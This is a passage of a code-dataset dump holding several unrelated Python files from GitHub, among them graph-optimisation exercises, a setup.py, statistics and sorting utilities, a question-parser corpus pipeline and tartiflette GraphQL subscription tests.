\n\t\t\t\t\telse:\n\t\t\t\t\t\tcosts_new_graph[i]=costs_new_graph[i]+edge2.costs[labeling[edge2.left],i] \n\t\tnodes.append(Node(costs=costs_new_graph))\n\n\t#For right node of the last edge\n\tcost=grid._nodes[edge.right].costs\n\tnode=edge.right\n\tneighbours=grid.edges(node,True) \n\tset_neighbours=set()\n\tfor edge_neigh in neighbours:\n\t\tset_neighbours.add((edge_neigh.left,edge_neigh.right))\n\tedges_node_not_subgraph=list(set_neighbours-set_edges_subgraph)\n\tcosts_new_graph=cost.copy()\n\tfor i in range(len(cost)):\n\t\tfor edge2 in neighbours:\n\t\t\tif (edge2.left,edge2.right) in edges_node_not_subgraph:\n\t\t\t\tif edge2.left==node:\n\t\t\t\t\tcosts_new_graph[i]=costs_new_graph[i]+edge2.costs[i,labeling[edge2.right]] \n\t\t\t\telse:\n\t\t\t\t\tcosts_new_graph[i]=costs_new_graph[i]+edge2.costs[labeling[edge2.left],i] \n\tnodes.append(Node(costs=costs_new_graph))\n\tedges=[Edge(left=i, right=i+1, costs=sub_graph[i].costs) for i in range(len(sub_graph))]\n\treturn nodes,edges\n\ndef trans_labeling_to_big_graph(sub_graph,aux_labeling,labeling_):\n\tcount=0\n\tlabeling=labeling_.copy()\n\tfor e in sub_graph:\n\t\t\n\t\tlabeling[e.left]=aux_labeling[count]\n\t\t\n\t\tcount=count+1\n\tlabeling[sub_graph[-1].right]=aux_labeling[-1]\n\treturn labeling\n\n\ndef trans_labeling_to_aux_graph(sub_graph,labeling_):\n\tcount=0\n\taux_old_labeling=[0]*(len(sub_graph)+1)\n\tfor e in sub_graph:\n\t\taux_old_labeling[count]=labeling_[e.left]\n\t\t\t\t\t\t\t\n\t\tcount=count+1\n\taux_old_labeling[-1]=labeling_[sub_graph[-1].right]\n\treturn aux_old_labeling\n#BLOCK-ICM\ndef Block_ICM(grid):\n\t#Random initialisation\n\tlabeling=Rand_ini(grid._nodes)\n\tdecomp=row_column_decomposition(grid)\n\tupdate=True\n\twhile update:\n\t\tupdate=False\n\t\trandom.shuffle(decomp)\n\t\tfor sub_graph in decomp:\n\t\t\taux_sub_graph=create_aux_graph(sub_graph,labeling,grid)\n\t\t\tintermediates=dynamic_programming_tree(aux_sub_graph[0],aux_sub_graph[1])\n\t\t\taux_labeling=backtrack_tree(aux_sub_graph[0],aux_sub_graph[1],*intermediates)\n\t\t\taux_old_labeling=trans_labeling_to_aux_graph(sub_graph,labeling)\n\t\t\told_energy_aux=evaluate_energy(aux_sub_graph[0],aux_sub_graph[1],aux_old_labeling)\n\t\t\tnew_energy_aux=evaluate_energy(aux_sub_graph[0],aux_sub_graph[1],aux_labeling)\n\t\t\tif new_energy_aux<old_energy_aux:\n\t\t\t\tnew_labeling=trans_labeling_to_big_graph(sub_graph,aux_labeling,labeling)\n\t\t\t\tupdate=True\n\t\t\t\tlabeling=new_labeling\n\treturn labeling\n\n\n\n\n\n#%%\n#Exercise 3.4\n \n\ndef TRWS(grid,N=10,T_=2):\n F={}\n B={}\n r={}\n num_nodes=len(grid._nodes)\n #first u_num for node\n # following (u_num,v_num ) refer to edge\n for u_num in range(num_nodes):\n for v_num in grid.neighbors(u_num,isotropic=True):\n if u_num<v_num:\n F[(u_num,u_num,v_num)]=[0]*len(grid._nodes[u_num].costs)\n B[(u_num,u_num,v_num)]=[0]*len(grid._nodes[u_num].costs)\n r[(u_num,u_num,v_num)]=[0]*len(grid._nodes[u_num].costs)\n else:\n F[(u_num,v_num,u_num)]=[0]*len(grid._nodes[u_num].costs)\n B[(u_num,v_num,u_num)]=[0]*len(grid._nodes[u_num].costs)\n r[(u_num,v_num,u_num)]=[0]*len(grid._nodes[u_num].costs)\n \n list_nodes=[i for i in range(num_nodes)]\n for t in range(N):\n for u_num in list_nodes:\n u=grid._nodes[u_num]\n u_num_labels=len(u.costs)\n hat_theta=[]\n for s in range(u_num_labels):\n theta_aux=u.costs[s]\n for v_num in grid.neighbors(u_num,isotropic=True):\n if v_num<u_num:\n theta_aux=theta_aux+F[(u_num,v_num,u_num)][s]\n else:\n theta_aux=theta_aux+B[(u_num,u_num,v_num)][s]\n hat_theta.append(theta_aux)\n \n for edge in grid.edges(u_num):\n v_num=edge.right\n v=grid._nodes[v_num]\n for l in range(len(v.costs)):\n aux_list=[]\n for s in range(u_num_labels):\n aux_list.append(hat_theta[s]/T_-B[(u_num,u_num,v_num)][s]+edge.costs[s,l])\n F[(v_num,u_num,v_num)][l]=np.min(aux_list)\n r[(v_num,u_num,v_num)][l]=np.argmin(aux_list)\n \n dict_aux=F.copy()\n F=B.copy()\n B=dict_aux.copy()\n list_nodes=list_nodes[::-1]\n assignment=reconstruct_labeling(grid,B)\n return assignment\n\ndef reconstruct_labeling(grid,B):\n num_nodes=len(grid._nodes)\n u_num=num_nodes-1\n u=grid._nodes[u_num]\n assignment=[0]*num_nodes\n aux_list=[]\n for s in range(len(u.costs)):\n aux_sum=0\n for v_num in grid.neighbors(u_num,isotropic=True):\n if u_num<v_num:\n aux_sum=aux_sum-B[(u_num,u_num,v_num)][s]\n else:\n aux_sum=aux_sum-B[(u_num,v_num,u_num)][s]\n aux_list.append(u.costs[s]-aux_sum)\n assignment[u_num]=np.argmin(aux_list)\n \n for u_num in reversed(range(num_nodes-1)):\n u=grid._nodes[u_num]\n aux_list=[]\n for s in range(len(u.costs)):\n aux_sum=0\n for edge in grid.edges(u_num,isotropic=True):\n if u_num==edge.left:\n v_num=edge.right\n else:\n v_num=edge.left\n if u_num<v_num:\n aux_sum=aux_sum+(u_num==edge.left)*edge.costs[s,assignment[v_num]]+(v_num==edge.left)*edge.costs[assignment[v_num],s]\n else:\n aux_sum=aux_sum+B[(u_num,v_num,u_num)][s]\n aux_list.append(u.costs[s]+aux_sum)\n assignment[u_num]=np.argmin(aux_list)\n return assignment\n\n#from tsukuba_model import all_models\n#from tsukuba_visualize import to_image\n#import matplotlib.pyplot as plt\n#from grid import determine_grid\n#import numpy as np\n#import time\n#models=all_models()\n#count=0\n#for model in models:\n# print('MODEL DOWN',2**(5-count))\n# \n# grid=determine_grid(model[0],model[1])\n# \n# start= time.time()\n# assignment=TRWS(grid)\n# end= time.time()\n# energy=evaluate_energy(grid._nodes, grid._edges, assignment)\n# img_size=(12*(2**count),9*(2**count))\n# print (img_size)\n# print('Objective cost=',energy)\n# print('Time elapsed', end-start)\n# img=to_image(assignment,img_size)\n# plt.imshow(np.asarray(img),cmap='gray')\n# plt.show()\n# count=count+1\n","repo_name":"Shivalid/Optimization-for-Machine-Learning","sub_path":"Ex3/Exercise3.py","file_name":"Exercise3.py","file_ext":"py","file_size_in_byte":11071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9729147304","text":"from setuptools import setup\n\nimport os\n\n\nlong_description = \"\"\nif os.path.exists('README.md'):\n long_description = open('README.md').read()\n\n\nsetup(\n name='push7',\n version='0.0.6',\n description='Python API Client for Push7',\n long_description=long_description,\n license=\"MIT\",\n keywords=\"push7\",\n author='a_r_g_v',\n author_email='info@arg.vc',\n url='https://github.com/a-r-g-v/push7-python',\n test_suite='tests',\n packages=['push7'],\n install_requires=['requests', 'simplejson', 'six', 'enum34', 'typing'])\n","repo_name":"a-r-g-v/push7-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"41168514323","text":"#given a list of numbers or variables in a string, with relation '>'\n#determines if the relations hold, and returns a dictionary of the values\n\ndef tOrder(string):\n el = string.split(\" > \")\n work = \"{\"\n for e in el:\n work = work + \"'\" + e + \"'\" +\":\" + e + \", \"\n \n if eval(string) == True:\n print(\"order HOLDS.\")\n else:\n print(\"order MODIFIED.\")\n \n work = work + \"}\"\n return eval(work)\n\n \n#finds an ordering of a set of pairs of dictionary elements\ndef findOrder(elmPairs):\n result = elmPairs\n #for e in result:\n # result[result.index(e)] = Dec.copy_abs(e)\n \n sort_result = sorted(result.items(), key=lambda x: x[1], reverse=True)\n string = \"\"\n for i in sort_result:\n #print(i[0])\n string = string + \" > \" + i[0]\n \n string = string[3:] #removes the erroneous additional \">\"\n #return sort_result\n return string\n","repo_name":"doorkicker/snippets","sub_path":"order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"188553809","text":"import numpy as np\n\ndef calculate(list):\n if len(list) < 9:\n raise ValueError( \"List must contain nine numbers.\" )\n else:\n\n lst=np.array(list)\n\n mean_rows_cal=[lst[0:3].mean(), lst[3:6].mean(), lst[6:9].mean()]\n mean_cols_cal=([lst[[0,3,6]].mean(),lst[[1,4,7]].mean(),lst[[2,5,8]].mean()])\n\n var_rows_cal=[lst[0:3].var(), lst[3:6].var(), lst[6:9].var()]\n var_cols_cal=([lst[[0,3,6]].var(),lst[[1,4,7]].var(),lst[[2,5,8]].var()])\n\n std_rows_cal=[lst[0:3].std(), lst[3:6].std(), lst[6:9].std()]\n std_cols_cal=([lst[[0,3,6]].std(),lst[[1,4,7]].std(),lst[[2,5,8]].std()])\n\n min_rows_cal=[lst[0:3].min(), lst[3:6].min(), lst[6:9].min()]\n min_cols_cal=([lst[[0,3,6]].min(),lst[[1,4,7]].min(),lst[[2,5,8]].min()])\n \n max_rows_cal=[lst[0:3].max(), lst[3:6].max(), lst[6:9].max()]\n max_cols_cal=([lst[[0,3,6]].max(),lst[[1,4,7]].max(),lst[[2,5,8]].max()])\n\n sum_rows_cal=[lst[0:3].sum(), lst[3:6].sum(), lst[6:9].sum()]\n sum_cols_cal=([lst[[0,3,6]].sum(),lst[[1,4,7]].sum(),lst[[2,5,8]].sum()])\n \n \n \n\n \n\n\n\n\n return{\n 'mean':[mean_cols_cal,mean_rows_cal,lst.mean()],\n 'variance': [var_cols_cal, var_rows_cal, lst.var()],\n 'standard deviation': [std_cols_cal, std_rows_cal, lst.std()],\n 'max': [max_cols_cal, max_rows_cal, lst.max()],\n 'min': [min_cols_cal, min_rows_cal, lst.min()],\n 'sum': [sum_cols_cal,sum_rows_cal, lst.sum()]\n \n }","repo_name":"mhpolas/mean-variance-standard-deviation-calculator-mhpolas","sub_path":"mean_var_std.py","file_name":"mean_var_std.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"37797172211","text":"import unittest\n\nimport cliente\nimport json\n\nfrom ojeo import Ojeo\nimport jugador\n#from ojeo import Ojeo\n\n\nclass TestOjeo(unittest.TestCase):\n\n def setUp(self):\n dbacceso.activar_testeo()\n self.app = cliente.app.test_client()\n #cliente.Ojeo.crear_ejemplos()\n dbacceso.insert_test_db('delete from jugador')\n\n \n def test_get_Ojeos(self):\n return None # --\n ret = self.app.get('/Ojeo').get_data(as_text=True) # JSON string\n retpy = json.loads(ret) # Python dict\n \n len_now = len(retpy)\n \n self.app.post('/Ojeo', data={'nombre':'Cebolla', 'club':'independiente', 'posicion':'volante', 'costo':1000})\n \n ret = self.app.get('/Ojeo').get_data(as_text=True) # JSON string\n retpy = json.loads(ret) # Python dict\n\n self.assertEqual( len(retpy) , len_now+1 )\n \nif __name__ == \"__main__\":\n unittest.main()","repo_name":"mat105/rest_python","sub_path":"test_ojeo.py","file_name":"test_ojeo.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28585049235","text":"# Counting Sort\n# Chcemy posortowac pewna tablice rozmiaru n zawierajaca liczby od 0 do k-1 (dla liczb naturalnych)\n# zachowuje stablinosc, O(n+k)\n\ndef counting_sort(A, k): # k - zakres liczb od 0 do k (dla 5 k = 6)\n C = [0] * k # dla A=[1,3,2,4,0,4,2]\n B = [0] * len(A) # C=[1,1,2,2,1], bo 0 wystepuje raz, 1 wystepuje raz itp.\n for i in range(len(A)): # albo { for x in A\n C[A[i]] += 1 # C[x] += 1 }\n for i in range(1, k): # ile liczb jest mniejszych\n C[i] += C[i-1] # lub rownych i # C=[1,2,4,6,7]\n for i in range(len(A)-1, -1, -1): # przegladam tablice od tylu\n C[A[i]] -= 1 # dla \"2\": 2 jest wieksza lub rowna od 4 liczb\n B[C[A[i]]] = A[i] # wiec odejmuje 1 dostaje 3 (C = [1,2,3,6,7])\n for i in range(len(A)): # i umieszczam na 3 pozycji dwojke w tablicy B itp.\n A[i] = B[i]\n\n\n# T = [1, 9, 12, 0, 1, 14, 15, 2]\n# (counting_sort(T, 16))\n# print(T)\n\nT = [0, 5, 2, 3, 3, 2, 0]\ncounting_sort(T, 6)\n# print(T)","repo_name":"marcepanowyy/Algorithms-DataStructures","sub_path":"Sorting/CountingSort.py","file_name":"CountingSort.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42307648539","text":"import glob\nimport os\nimport re\nimport argparse\n\nparser = argparse.ArgumentParser(description='Combine samples from different lanes into one')\nparser.add_argument('-s', '--sample', dest = 'sample', help = 'sample name, e.g., 18774X1')\nargs = parser.parse_args()\n\ndef naturalSort(mylist):\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]\n return sorted(mylist, key = alphanum_key)\n\n# set file extensions\nforwardExt='_R1_001.fastq.gz'\nreverseExt='_R3_001.fastq.gz'\numiExt='_R2_001.fastq.gz'\n\n# combine samples\nsampleName=str(args.sample).split('_')[0]\n\nforwardFiles=naturalSort(glob.glob(sampleName+'_*'+forwardExt))\nos.system('cat '+' '.join(forwardFiles)+' > ./'+sampleName+forwardExt)\n\nreverseFiles=naturalSort(glob.glob(sampleName+'_*'+reverseExt))\nos.system('cat '+' '.join(reverseFiles)+' > ./'+sampleName+reverseExt)\n\numiFiles=naturalSort(glob.glob(sampleName+'_*'+umiExt))\nos.system('cat '+' '.join(umiFiles)+' > ./'+sampleName+umiExt)\n","repo_name":"BrianLohman/ctseq-nf","sub_path":"combineFiles.py","file_name":"combineFiles.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32982475792","text":"import json\nimport csv\nimport os\nfrom pathlib import Path\n\nfrom statistics import mean\n\n#from geo_question_parser import QuestionParser\nfrom geo_question_parser_haiqi.Identify_new import QuestionParser as QuestionParserNew\n\n\ndef parseConceptTree(corpusId = \"GeoAnQu\", corpusNS = \"qac\"):\n jsonArray = []\n\n # [SC] open corpus datafile\n with open(Path(f\"{corporaDir}/{corpusId}.txt\"), 'r') as datacsvfile:\n datacsvreader = csv.DictReader(datacsvfile, delimiter=';')\n\n # parser = QuestionParser(None)\n parser = QuestionParserNew()\n\n # [SC] iterate through the questions in the corpus\n for q in datacsvreader:\n qId = q[\"ID\"]\n qStr = q[\"Question\"]\n\n if \"Fixed\" in q and q['Fixed'] == \"0\":\n continue\n\n qParsed = {}\n try:\n qParsed = parser.parseQuestion(qStr)\n except Exception as e:\n print(\"================================================== Exception\")\n print(f\"while parsing question with id {qId} and {qStr}\")\n print(e)\n\n jsonObj = {\n \"id\": qId,\n \"qParsed\": qParsed\n }\n\n if \"RQuestion\" in q:\n rqStr = q[\"RQuestion\"]\n rqParsed = {}\n try:\n rqParsed = parser.parseQuestion(rqStr)\n except Exception as e:\n print(\"================================================== Exception\")\n print(f\"while parsing question with id {qId} and {rqStr}\")\n print(e)\n\n jsonObj[\"rqParsed\"] = rqParsed\n\n jsonArray.append(jsonObj)\n\n with open(Path(f\"{dataOutputDir}/{corpusId}.json\"), 'w') as f:\n json.dump(jsonArray, f, indent=4)\n\n return jsonArray\n\n\ndef generateStats(corpusId, revised=False):\n typesStr = ['conamount', 'amount', 'eventquality', 'objconobjconpro', 'field', 'placename', 'boolfield',\n 'objconamount', 'network', 'distfield', 'aggre', 'object', 'objectquality', 'distanceBand', 'grid',\n 'networkquality', 'allocation', 'proportion', 'event', 'eveconamount', 'covamount', 'location',\n 'eveconobjconpro']\n typesStr.sort()\n\n # [SC] open the json file containing parsed results\n with open(Path(f\"{dataOutputDir}/{corpusId}.json\"), 'r') as f\\\n , open(Path(f\"{corporaDir}/{corpusId}_missing.json\"), 'r') as fm:\n jsonArray = json.load(f)\n missingJsonArray = json.load(fm)\n jsonArray.extend(missingJsonArray)\n\n suffix = \"\"\n if revised:\n suffix = \"_r\"\n\n # [SC] type and transformation count summary is stored in this CSV file\n with open(Path(f\"{dataOutputDir}/{corpusId}_ParserStats{suffix}.txt\"), 'w', newline='') as statsFile:\n fieldnames = ['ID', 'Question', 'qTypesCount', 'qTransCount', 'qOutputType']\n fieldnames.extend(typesStr)\n statsWriter = csv.DictWriter(statsFile, fieldnames=fieldnames, delimiter=\";\")\n statsWriter.writeheader()\n\n for qResult in jsonArray:\n newRow = {\n \"ID\": qResult[\"id\"],\n \"Question\": \"NA\",\n \"qTypesCount\": \"NA\",\n \"qTransCount\": \"NA\",\n 'qOutputType': \"NA\"\n }\n for typeStr in typesStr:\n newRow[typeStr] = \"NA\"\n\n nodeName = \"qParsed\"\n if revised:\n nodeName = \"rqParsed\"\n\n # [SC] create a summary for the original question\n if nodeName in qResult and not qResult[nodeName][\"question\"] == \"NA\":\n qParsed = qResult[nodeName]\n\n newRow[\"Question\"] = qParsed[\"question\"]\n newRow[\"qTypesCount\"] = 0\n newRow[\"qTransCount\"] = 0\n\n for typeStr in typesStr:\n newRow[typeStr] = 0\n\n if \"cctrans\" in qParsed:\n if \"types\" in qParsed[\"cctrans\"]:\n newRow[\"qTypesCount\"] = len(qParsed[\"cctrans\"][\"types\"])\n\n for typeObj in qParsed[\"cctrans\"][\"types\"]:\n typeStr = typeObj[\"type\"]\n newRow[typeStr] = newRow[typeStr] + 1\n\n if \"transformations\" in qParsed[\"cctrans\"]:\n transCount = len(qParsed[\"cctrans\"][\"transformations\"])\n newRow[\"qTransCount\"] = transCount\n\n # [SC] extract type of the output\n transesObj = qParsed[\"cctrans\"][\"transformations\"]\n for transIndex in range(transCount-1, -1, -1):\n afterId = transesObj[transIndex][\"after\"][0]\n\n finalOutput = True\n for transObj in transesObj:\n if afterId in transObj[\"before\"]:\n finalOutput = False\n\n if finalOutput:\n for typeObj in qParsed[\"cctrans\"][\"types\"]:\n if typeObj[\"id\"] == afterId:\n newRow[\"qOutputType\"] = typeObj[\"type\"]\n break\n\n statsWriter.writerow(newRow)\n\n\ndef printBasicStats(corpusId):\n # [SC] open the json file containing parsed results\n with open(Path(f\"{dataOutputDir}/{corpusId}.json\"), 'r') as f \\\n , open(Path(f\"{corporaDir}/{corpusId}_missing.json\"), 'r') as fm:\n jsonArray = json.load(f)\n missingJsonArray = json.load(fm)\n jsonArray.extend(missingJsonArray)\n\n qTypesCount = 0\n qTransCount = 0\n qTypeLengths = []\n qTransLengths = []\n\n rqTypesCount = 0\n rqTransCount = 0\n rqTypeLengths = []\n rqTransLengths = []\n\n for qResult in jsonArray:\n qParsed = qResult[\"qParsed\"]\n if \"cctrans\" in qParsed:\n if \"types\" in qParsed[\"cctrans\"] and qParsed[\"cctrans\"][\"types\"]:\n qTypesCount += 1\n qTypeLengths.append(len(qParsed[\"cctrans\"][\"types\"]))\n if \"transformations\" in qParsed[\"cctrans\"] and qParsed[\"cctrans\"][\"transformations\"]:\n qTransCount += 1\n qTransLengths.append(len(qParsed[\"cctrans\"][\"transformations\"]))\n\n if \"rqParsed\" in qResult:\n rqParsed = qResult[\"rqParsed\"]\n if \"cctrans\" in rqParsed:\n if \"types\" in rqParsed[\"cctrans\"] and rqParsed[\"cctrans\"][\"types\"]:\n rqTypesCount += 1\n rqTypeLengths.append(len(rqParsed[\"cctrans\"][\"types\"]))\n if \"transformations\" in rqParsed[\"cctrans\"] and rqParsed[\"cctrans\"][\"transformations\"]:\n rqTransCount += 1\n rqTransLengths.append(len(rqParsed[\"cctrans\"][\"transformations\"]))\n\n print(f\"\\nStats for the corpus {corpusId}:\")\n print(\"\\tOriginal questions => \"\\\n f\"Types: {qTypesCount} ({round(qTypesCount*100/len(jsonArray))}%); \"\\\n f\"Transformations: {qTransCount} ({round(qTransCount*100/len(jsonArray))}%); \"\\\n f\"Types mean length: {round(mean(qTypeLengths), 1)}; \"\\\n f\"Trans mean length: {round(mean(qTransLengths), 1)}\")\n if len(rqTypeLengths) > 0:\n print(\"\\tReformatted questions => \"\\\n f\"Types: {rqTypesCount} ({round(rqTypesCount*100/len(jsonArray))}%); \"\\\n f\"Transformations: {rqTransCount} ({round(rqTransCount*100/len(jsonArray))}%) \"\\\n f\"Types mean length: {round(mean(rqTypeLengths), 1)}; \"\\\n f\"Trans mean length: {round(mean(rqTransLengths), 1)}\")\n\n\ndef compareToBaseline():\n baseline = Path(f\"{rootDir}/geo_question_parser_haiqi/orgResults/GeoAnQu_parser_results.json\")\n output = Path(f\"{rootDir}/outputData/GeoAnQu.json\")\n\n with open(output, 'r') as outf, open(baseline, 'r') as basef:\n outArray = json.load(outf)\n baseArray = json.load(basef)\n\n for index in range(len(baseArray)):\n # print(f\"comparing {outArray[index]['qParsed']['question']}\")\n\n if not baseArray[index][\"question\"] == outArray[index][\"qParsed\"][\"question\"]:\n print(\"========================== MISMATCHING questions\")\n print(baseArray[index][\"question\"])\n print(outArray[index][\"qParsed\"][\"question\"])\n elif not json.dumps(baseArray[index]) == json.dumps(outArray[index][\"qParsed\"]):\n print(\"========================== MISMATCHING PARSE for questions\")\n print(baseArray[index][\"question\"])\n print(outArray[index][\"qParsed\"][\"question\"])\n\n\ndef getUniqueTypes(corpusId=\"GeoAnQu\"):\n with open(Path(f\"{dataOutputDir}/{corpusId}.json\"), 'r') as f:\n jsonArray = json.load(f)\n\n uniqueTypes = set()\n\n for qResult in jsonArray:\n if (\"qParsed\" in qResult and\n \"cctrans\" in qResult[\"qParsed\"] and\n \"types\" in qResult[\"qParsed\"][\"cctrans\"]):\n\n for typeObj in qResult[\"qParsed\"][\"cctrans\"][\"types\"]:\n uniqueTypes.add(typeObj[\"type\"])\n\n if (\"rqParsed\" in qResult and\n \"cctrans\" in qResult[\"rqParsed\"] and\n \"types\" in qResult[\"rqParsed\"][\"cctrans\"]):\n\n for typeObj in qResult[\"rqParsed\"][\"cctrans\"][\"types\"]:\n uniqueTypes.add(typeObj[\"type\"])\n\n print(uniqueTypes)\n\n\nif __name__ == \"__main__\":\n rootDir = os.path.dirname(os.path.realpath(__file__))\n\n # [SC] folder with input corpora\n corporaDir = f\"{rootDir}/inputCorpora\"\n # [SC] data output folder\n dataOutputDir = f\"{rootDir}/outputData\"\n \n \n geoTwoJson = parseConceptTree(\"Geo201\", \"g201\") # GeoQuestions201 corpus\n geoQueryJson = parseConceptTree(\"GeoQuery\", \"geoq\") # GeoQuery corpus\n gikiJson = parseConceptTree(\"Giki\", \"giki\") # GikiCLEF/GikiP corpora\n geoClefJson = parseConceptTree(\"GeoCLEF\", \"geoclef\") # GeoCLEF corpora\n geoAnQuJson = parseConceptTree() # GeoAnQu corpora\n\n generateStats(\"Geo201\")\n generateStats(\"Geo201\", True)\n generateStats(\"GeoQuery\")\n generateStats(\"GeoQuery\", True)\n generateStats(\"Giki\")\n generateStats(\"Giki\", True)\n generateStats(\"GeoCLEF\")\n generateStats(\"GeoCLEF\", True)\n generateStats(\"GeoAnQu\")","repo_name":"quangis/AGILE2023-Semantic-complexity-GeoAnQu","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4705771371","text":"# -*- coding:UTF-8 -*-\n# Author:Tiny Snow\n# Date: Sat, 20 Feb 2021, 21:32\n# Project Euler # 033 Digit cancelling fractions\n\n#====================================================================Solution\nfrom math import *\n\ndef is_curious(m, n):\n flag = False\n if str(m)[1] == str(n)[0] and str(n)[1] != '0':\n if int(str(m)[0]) / int(str(n)[1]) == m / n:\n flag = True\n return flag\n\nproduct_numerator = 1\nproduct_denominator = 1\n\nfor m in range(10, 100):\n for n in range(m + 1, 100):\n if m % 10 == 0 and n % 10 == 0:\n continue\n if is_curious(m, n) == True:\n product_numerator *= m\n product_denominator *= n\n\nprint(product_denominator // gcd(product_denominator, product_numerator))","repo_name":"Tiny-Snow/Project-Euler-Problem-Solutions","sub_path":"PE-Python/P033/P033.py","file_name":"P033.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"9996934034","text":"import asyncio\n\nimport pytest\n\nfrom tartiflette import Resolver, Subscription, create_engine\nfrom tartiflette.types.exceptions.tartiflette import (\n NonAsyncGeneratorSubscription,\n NotSubscriptionField,\n)\n\n_SDL = \"\"\"\ntype Query {\n search(query: String!): [String!]\n}\n\ntype MySubscription {\n newSearch(query: String!): [String!]\n customSearch(query: String!): [String!]\n}\n\nschema {\n query: Query\n subscription: MySubscription\n}\n\"\"\"\n\n_SEARCHS = [\n [\"Search #1\"],\n [\"Search #2\"],\n [\"Search #3\"],\n [\"Search #4\"],\n [\"Search #5\"],\n]\n\n\n@pytest.fixture(scope=\"module\")\nasync def ttftt_engine():\n @Subscription(\"MySubscription.newSearch\", schema_name=\"test_subscribe\")\n async def subscription_new_search(*_, **__):\n for search in _SEARCHS:\n yield {\"newSearch\": search}\n await asyncio.sleep(0.01)\n\n class MySubscriptionCustomSearchSubscriber:\n async def __call__(self, *_, **__):\n for search in _SEARCHS:\n yield {\"newSearch\": search}\n await asyncio.sleep(0.01)\n\n Subscription(\"MySubscription.customSearch\", schema_name=\"test_subscribe\")(\n MySubscriptionCustomSearchSubscriber()\n )\n\n @Resolver(\"MySubscription.customSearch\", schema_name=\"test_subscribe\")\n async def resolver_subscription_custom_search(parent, args, ctx, info):\n return [f\"{search} #c\" for search in parent[\"newSearch\"]]\n\n return await create_engine(sdl=_SDL, schema_name=\"test_subscribe\")\n\n\n@pytest.mark.asyncio\nasync def test_subscribe_error(ttftt_engine):\n i = 0\n\n async for result in ttftt_engine.subscribe(\n \"\"\"\n subscription ($query: String!) {\n newSearch(query: $query)\n }\n \"\"\"\n ):\n i += 1\n assert result == {\n \"data\": None,\n \"errors\": [\n {\n \"message\": \"Variable < $query > of required type < String! > was not provided.\",\n \"path\": None,\n \"locations\": [{\"line\": 2, \"column\": 23}],\n }\n ],\n }\n\n assert i == 1\n\n\n@pytest.mark.asyncio\nasync def test_subscribe(ttftt_engine):\n i = 0\n async for result in ttftt_engine.subscribe(\n \"\"\"\n subscription {\n newSearch(query: \"A query\")\n }\n \"\"\"\n ):\n i += 1\n assert result == {\"data\": {\"newSearch\": [f\"Search #{i}\"]}}\n\n assert i == 5\n\n\n@pytest.mark.asyncio\nasync def test_subscribe_aliases(ttftt_engine):\n i = 0\n async for result in ttftt_engine.subscribe(\n \"\"\"\n subscription {\n aSearch: newSearch(query: \"A query\")\n }\n \"\"\"\n ):\n i += 1\n assert result == {\"data\": {\"aSearch\": [f\"Search #{i}\"]}}\n\n assert i == 5\n\n\n@pytest.mark.asyncio\nasync def test_subscribe_custom_search(ttftt_engine):\n i = 0\n async for result in ttftt_engine.subscribe(\n \"\"\"\n subscription {\n customSearch(query: \"A query\")\n }\n \"\"\"\n ):\n i += 1\n assert result == {\"data\": {\"customSearch\": [f\"Search #{i} #c\"]}}\n\n assert i == 5\n\n\n@pytest.mark.asyncio\nasync def test_subscribe_custom_search_aliases(ttftt_engine):\n i = 0\n async for result in ttftt_engine.subscribe(\n \"\"\"\n subscription {\n aSearch: customSearch(query: \"A query\")\n }\n \"\"\"\n ):\n i += 1\n assert result == {\"data\": {\"aSearch\": [f\"Search #{i} #c\"]}}\n\n assert i == 5\n\n\n@pytest.mark.asyncio\nasync def test_subscribe_non_async_generator_implementation():\n with pytest.raises(\n NonAsyncGeneratorSubscription,\n match=r\"The subscription < .* > given is not an awaitable generator.\",\n ):\n\n async def subscription_search(*_, **__):\n return 1\n\n Subscription(\n \"Query.search\", schema_name=\"test_subscribe_non_subscription_field\"\n )(subscription_search)\n\n await create_engine(\n _SDL, schema_name=\"test_subscribe_non_subscription_field\"\n )\n\n\n@pytest.mark.asyncio\nasync def test_subscribe_non_subscription_field():\n with pytest.raises(\n NotSubscriptionField,\n match=\"Field < Query.search > isn't a subscription field.\",\n ):\n\n async def subscription_query_search(*_, **__):\n yield {}\n\n Subscription(\n \"Query.search\", schema_name=\"test_subscribe_non_subscription_field\"\n )(subscription_query_search)\n\n await create_engine(\n _SDL, schema_name=\"test_subscribe_non_subscription_field\"\n )\n","repo_name":"tartiflette/tartiflette","sub_path":"tests/functional/test_subscribe.py","file_name":"test_subscribe.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":849,"dataset":"github-code","pt":"44"} +{"seq_id":"13831329971","text":"from numpy.fft import *\nfrom numpy.linalg import *\nfrom numpy import *\nfrom scipy.signal import *\nfrom scipy.optimize import minimize\nfrom matplotlib.pylab import plot,show\n\ndef FFTLengthPower2(N):\n\n return int(2**(ceil(log(N)/log(2))))\n\n\ndef localmax(x):\n\n indmax=(diff(sign(diff(x))) < 0).nonzero()[0] + 1\n\n return indmax\n\n\ndef localmin(x):\n\n indmin=(diff(sign(diff(x))) > 0).nonzero()[0] + 1 # local min\n\n return indmin\n\ndef rootind(x):\n\n sgn = sign(x)\n\n indroot = array(range(len(x)-1))\n\n indroot = indroot[sgn[0:-1]*sgn[1::] <= 0]\n\n return indroot\n\ndef 